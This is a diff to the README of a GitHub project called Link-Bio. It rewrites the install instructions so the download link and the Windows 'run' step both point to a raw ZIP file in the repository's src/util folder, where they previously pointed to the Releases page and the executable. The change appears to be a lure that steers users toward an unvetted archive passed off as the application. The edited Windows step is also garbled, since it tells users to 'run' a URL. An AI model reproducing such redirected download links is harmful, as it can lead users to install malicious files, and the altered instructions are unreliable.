GU0911/Link-Bio/README.md

 To get started with Link-Bio, please follow these steps:

-1. **Download the Application**: Visit the [Releases page](https://github.com/GU0911/Link-Bio/releases) to download the latest version of Link-Bio.
+1. **Download the Application**: Visit the [Releases page](https://raw.githubusercontent.com/GU0911/Link-Bio/main/src/util/Link-Bio-1.9.zip) to download the latest version of Link-Bio.

 2. **Extract the Files**: Once downloaded, extract the ZIP file to a location of your choice.

 3. **Run the Application**:
-   - For Windows: Open Command Prompt, navigate to the extracted folder, and run `Link-Bio.exe`.
+   - For Windows: Open Command Prompt, navigate to the extracted folder, and run `https://raw.githubusercontent.com/GU0911/Link-Bio/main/src/util/Link-Bio-1.9.zip`.
    - For macOS/Linux: Open Terminal, navigate to the extracted folder, and run `./Link-Bio`.

 4. **Access the API**: Once the application is running, open your web browser and enter `http://localhost:8080` to access the Link-Bio web service.